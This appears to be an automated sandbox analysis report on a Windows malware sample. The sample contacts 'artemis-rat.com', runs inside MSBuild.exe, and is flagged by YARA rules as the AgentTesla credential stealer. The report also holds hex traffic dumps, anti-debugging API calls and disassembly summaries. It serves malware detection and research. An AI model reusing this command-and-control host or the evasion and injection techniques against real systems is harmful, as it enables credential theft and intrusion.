                                              2024-03-11 07:37:15 UTC21INData Raw: 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                              Data Ascii: connection: close
                                              2024-03-11 07:37:15 UTC1370INData Raw: 32 32 45 43 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72
                                              Data Ascii: 22EC<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pr
                                              2024-03-11 07:37:15 UTC1370INData Raw: 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 61 66 61 39 39 64 63 66 34 30 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                              Data Ascii: ="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/
                                              2024-03-11 07:37:15 UTC1370INData Raw: 67 69 74 68 75 62 2d 66 34 64 38 35 37 63 62 63 39 36 61 2e 63 73 73 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 70 6f 73 69 74 6f 72 79 2d 36 32 34 37 63 61 32 33 38 66 64 34 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73
                                              Data Ascii: github-f4d857cbc96a.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-6247ca238fd4.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubass
                                              2024-03-11 07:37:15 UTC1370INData Raw: 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 2d 37 39 66 39 36 31 31 63 32 37 35 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69
                                              Data Ascii: ps://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://gi
                                              2024-03-11 07:37:15 UTC1370INData Raw: 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6f 6d 62 6f 62 6f 78 2d 6e 61 76 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 61 72 6b 64 6f 77 6e 2d 74 6f 6f 6c 62 61 72 2d 65 2d 38 32 30 66 63 30 2d 62 63 38 66 30 32 62 39 36 37 34 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72
                                              Data Ascii: " defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js"></script><script crossorigin="anonymous" defer
                                              2024-03-11 07:37:15 UTC1370INData Raw: 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 33 33 38 66 62 37 63 34 37 65 37 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f
                                              Data Ascii: fer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-338fb7c47e7c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendo
                                              2024-03-11 07:37:15 UTC728INData Raw: 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 37 32 63 39 66 62 64 65 35 61 64 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78
                                              Data Ascii: ert_index_js-72c9fbde5ad4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index
                                              2024-03-11 07:37:15 UTC1370INData Raw: 35 44 31 34 0d 0a 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 74 61 73 6b 2d 6c 69 73 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6f 6e 66 6f 63 75 73 5f 74 73 2d 61 70 70 5f 61 73 73 2d 34 32 31 63 65 63 2d 39 64 65 34 32 31 33 30 31 35 61 66 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e
                                              Data Ascii: 5D14><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_onfocus_ts-app_ass-421cec-9de4213015af.js"></script>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.451325104.21.54.1584437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              2024-03-11 07:37:19 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              2024-03-11 07:37:19 UTC161INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              2024-03-11 07:37:19 UTC155INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.452582222.255.238.1594437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              2024-03-11 07:37:21 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              2024-03-11 07:37:21 UTC192INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Server: Apache/2.4.41 (Ubuntu)
                                              Content-Length: 613
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              2024-03-11 07:37:21 UTC613INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:08:37:11
                                              Start date:11/03/2024
                                              Path:C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              Imagebase:0x1cd87910000
                                              File size:30'208 bytes
                                              MD5 hash:BA06DF327B3CEEBC2D0E7A156B011B96
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:false

                                              General

                                              Target ID:2
                                              Start time:08:37:24
                                              Start date:11/03/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                              Imagebase:0xbd0000
                                              File size:262'432 bytes
                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3008889130.0000000003042000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3008889130.000000000301E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3008889130.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3008889130.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3006802921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3006802921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:moderate
                                              Has exited:false

                                              General

                                              Target ID:5
                                              Start time:08:37:28
                                              Start date:11/03/2024
                                              Path:C:\Windows\System32\WerFault.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 7284 -s 107720
                                              Imagebase:0x7ff712000000
                                              File size:570'736 bytes
                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:11.8%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:3.3%
                                                Total number of Nodes:91
                                                Total number of Limit Nodes:13
                                                execution_graph 38936 2dd70a8 38937 2dd70ec CheckRemoteDebuggerPresent 38936->38937 38938 2dd712e 38937->38938 38939 2dd0848 38941 2dd084e 38939->38941 38940 2dd091b 38941->38940 38945 2dd1380 38941->38945 38949 6672780 38941->38949 38953 6672790 38941->38953 38947 2dd1383 38945->38947 38946 2dd14aa 38946->38941 38947->38946 38957 2dd8268 38947->38957 38950 667279f 38949->38950 38970 6672188 38950->38970 38954 667279f 38953->38954 38955 6672188 2 API calls 38954->38955 38956 66727c0 38955->38956 38956->38941 38958 2dd8272 38957->38958 38959 2dd828c 38958->38959 38962 66efae8 38958->38962 38966 66efad9 38958->38966 38959->38947 38963 66efafd 38962->38963 38964 66efd12 38963->38964 38965 66efd28 GlobalMemoryStatusEx GlobalMemoryStatusEx 38963->38965 38964->38959 38965->38963 38967 66efafd 38966->38967 38968 66efd12 38967->38968 38969 66efd28 GlobalMemoryStatusEx GlobalMemoryStatusEx 38967->38969 38968->38959 38969->38967 38971 6672193 38970->38971 38974 667361c 38971->38974 38973 6674146 38975 6673627 38974->38975 38976 667486c 38975->38976 38979 66760ce 38975->38979 38983 66760e8 38975->38983 38976->38973 38981 66760dc 38979->38981 38980 667612d 38980->38976 38981->38980 38987 6676298 38981->38987 38985 6676109 38983->38985 38984 667612d 38984->38976 38985->38984 38986 6676298 2 API calls 38985->38986 38986->38984 38988 66762a5 38987->38988 38989 66762de 38988->38989 38991 667462c 38988->38991 38989->38980 38992 6674637 38991->38992 38994 6676750 38992->38994 38995 667463c 38992->38995 38996 6674647 38995->38996 39002 6676314 38996->39002 38998 66767bf 39006 667bac8 38998->39006 39012 667bae0 38998->39012 38999 66767f9 38999->38994 39005 667631f 39002->39005 39003 6677a48 39003->38998 39004 66760e8 2 API calls 39004->39003 39005->39003 39005->39004 39008 667bb5d 39006->39008 39009 667bb11 39006->39009 39007 667bb1d 39007->38999 39008->38999 39009->39007 39018 667bd48 39009->39018 39022 667bd58 39009->39022 39014 667bb11 39012->39014 39015 667bb5d 39012->39015 39013 667bb1d 39013->38999 39014->39013 39016 667bd48 2 API calls 39014->39016 39017 667bd58 2 API calls 39014->39017 39015->38999 39016->39015 39017->39015 39019 667bd58 39018->39019 39025 667bd98 39019->39025 39020 667bd62 39020->39008 39024 667bd98 2 API calls 39022->39024 39023 667bd62 39023->39008 39024->39023 39026 667bd9d 39025->39026 39028 667bddc 39026->39028 39031 667c033 LoadLibraryExW 39026->39031 39032 667c040 LoadLibraryExW 39026->39032 39027 667bdd4 39027->39028 39029 667bfe0 GetModuleHandleW 39027->39029 39028->39020 39030 667c00d 39029->39030 39030->39020 39031->39027 39032->39027 38934 6673ae0 DuplicateHandle 38935 6673b76 38934->38935 39033 667df90 39034 667dff8 CreateWindowExW 39033->39034 39036 667e0b4 39034->39036 39037 6673898 39038 66738de GetCurrentProcess 39037->39038 39040 6673930 GetCurrentThread 39038->39040 39042 6673929 39038->39042 39041 667396d GetCurrentProcess 39040->39041 39043 6673966 39040->39043 39046 66739a3 39041->39046 39042->39040 39043->39041 39044 66739cb GetCurrentThreadId 39045 66739fc 39044->39045 39046->39044

                                                Executed Functions

                                                Function 066E2418 Relevance: 9.0, Strings: 6, Instructions: 1487COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                • API String ID: 0-2392861976
                                                • Opcode ID: 789f8ffe5ff46b4c78f234304aa60daf7083699f1494dfd2f33e5f72dd28a15a
                                                • Instruction ID: 43741bdc201bcd99d6b69adc2e568b3c2ece1c2933960dd569ce0074bc041f8e
                                                • Opcode Fuzzy Hash: 789f8ffe5ff46b4c78f234304aa60daf7083699f1494dfd2f33e5f72dd28a15a
                                                • Instruction Fuzzy Hash: 3AD26834E10209CFCB64DF68C594A9DB7B6FF85300F5485AAD449AB365EB34ED86CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066EB2D8 Relevance: 8.3, Strings: 6, Instructions: 766COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                • API String ID: 0-2392861976
                                                • Opcode ID: 733850defe2e510d7192432dcf94b94b5eb37e0b568a7486e06886cd9670a293
                                                • Instruction ID: 4b88dcdff03dca56c0dbe504e9d7b3a5f06c2ee5ab2fe8aee1c06466558b1bf7
                                                • Opcode Fuzzy Hash: 733850defe2e510d7192432dcf94b94b5eb37e0b568a7486e06886cd9670a293
                                                • Instruction Fuzzy Hash: 92527E30E112099FDF64CF69D6907AEB7B2FB45310F20892AD405EB395DA35EC86CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02DDAD08 Relevance: 3.2, Instructions: 3159COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3008297970.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2dd0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 31c6fa13507835fda30cf0c9ca93af86d2b3c43caa761029f85b113ada13896c
                                                • Instruction ID: 0aad9320a4f7d058bbb941e961b612b042d7a4048122c36c714d3ecc95c73386
                                                • Opcode Fuzzy Hash: 31c6fa13507835fda30cf0c9ca93af86d2b3c43caa761029f85b113ada13896c
                                                • Instruction Fuzzy Hash: 0B73FA31D10B198EDB11EF68C844AA9F7B1FF99300F15D69AE45877221EB70AAC5CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E7E20 Relevance: 3.0, Strings: 2, Instructions: 470COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2329 66e7e20-66e7e3e 2330 66e7e40-66e7e43 2329->2330 2331 66e7e66-66e7e69 2330->2331 2332 66e7e45-66e7e61 2330->2332 2333 66e7e6b-66e7e75 2331->2333 2334 66e7e76-66e7e79 2331->2334 2332->2331 2335 66e7e9a-66e7e9d 2334->2335 2336 66e7e7b-66e7e95 2334->2336 2338 66e7e9f-66e7ead 2335->2338 2339 66e7eb4-66e7eb6 2335->2339 2336->2335 2344 66e7ec6-66e7edc 2338->2344 2347 66e7eaf 2338->2347 2341 66e7ebd-66e7ec0 2339->2341 2342 66e7eb8 2339->2342 2341->2330 2341->2344 2342->2341 2349 66e80f7-66e8101 2344->2349 2350 66e7ee2-66e7eeb 2344->2350 2347->2339 2351 66e8102-66e8137 2350->2351 2352 66e7ef1-66e7f0e 2350->2352 2355 66e8139-66e813c 2351->2355 2361 66e80e4-66e80f1 2352->2361 2362 66e7f14-66e7f3c 2352->2362 2357 66e8368-66e836b 2355->2357 2358 66e8142-66e8151 2355->2358 2359 66e8422-66e8425 2357->2359 2360 66e8371-66e837d 2357->2360 2370 66e8153-66e816e 2358->2370 2371 66e8170-66e81ab 2358->2371 2363 66e8448-66e844a 2359->2363 2364 66e8427-66e8443 2359->2364 2366 66e8388-66e838a 2360->2366 2361->2349 2361->2350 2362->2361 2387 66e7f42-66e7f4b 2362->2387 2367 66e844c 2363->2367 2368 66e8451-66e8454 2363->2368 2364->2363 2373 66e838c-66e8392 2366->2373 2374 66e83a2-66e83a9 2366->2374 2367->2368 2368->2355 2375 66e845a-66e8463 2368->2375 2370->2371 2385 66e833c-66e8352 2371->2385 2386 66e81b1-66e81c2 2371->2386 2378 66e8396-66e8398 2373->2378 2379 66e8394 2373->2379 2380 66e83ba 2374->2380 2381 66e83ab-66e83b8 2374->2381 2378->2374 2379->2374 2383 66e83bf-66e83c1 2380->2383 2381->2383 2390 66e83d8-66e8411 2383->2390 2391 66e83c3-66e83c6 2383->2391 2385->2357 2396 66e81c8-66e81e5 2386->2396 2397 66e8327-66e8336 2386->2397 2387->2351 2392 66e7f51-66e7f6d 2387->2392 2390->2358 2411 66e8417-66e8421 2390->2411 2391->2375 2399 66e80d2-66e80de 2392->2399 2400 66e7f73-66e7f9d 2392->2400 2396->2397 2408 66e81eb-66e82e1 call 66e6640 2396->2408 2397->2385 2397->2386 2399->2361 2399->2387 2413 66e80c8-66e80cd 2400->2413 2414 66e7fa3-66e7fcb 2400->2414 2462 66e82ef 2408->2462 2463 66e82e3-66e82ed 2408->2463 2413->2399 2414->2413 2421 66e7fd1-66e7fff 2414->2421 2421->2413 2426 66e8005-66e800e 2421->2426 2426->2413 2427 66e8014-66e8046 2426->2427 2435 66e8048-66e804c 2427->2435 2436 66e8051-66e806d 2427->2436 2435->2413 2438 66e804e 2435->2438 2436->2399 2439 66e806f-66e80c6 call 66e6640 2436->2439 2438->2436 2439->2399 2464 66e82f4-66e82f6 2462->2464 2463->2464 2464->2397 2465 66e82f8-66e82fd 2464->2465 2466 66e82ff-66e8309 2465->2466 2467 66e830b 2465->2467 2468 66e8310-66e8312 2466->2468 2467->2468 2468->2397 2469 66e8314-66e8320 2468->2469 2469->2397
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q
                                                • API String ID: 0-355816377
                                                • Opcode ID: a8508879df51496f13ce56306203817ae4bbf4c2e0fa3c9ec6b9483422e21582
                                                • Instruction ID: 72620e68bf971fbd3950c99404ecaa942da1030f67ca122d4f5e13f80657c80a
                                                • Opcode Fuzzy Hash: a8508879df51496f13ce56306203817ae4bbf4c2e0fa3c9ec6b9483422e21582
                                                • Instruction Fuzzy Hash: 6302BE30B022159FDB54DF68D994AAEB7E2FF84314F248469D409EB394DB35EC86CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02DD70A8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02DD711F
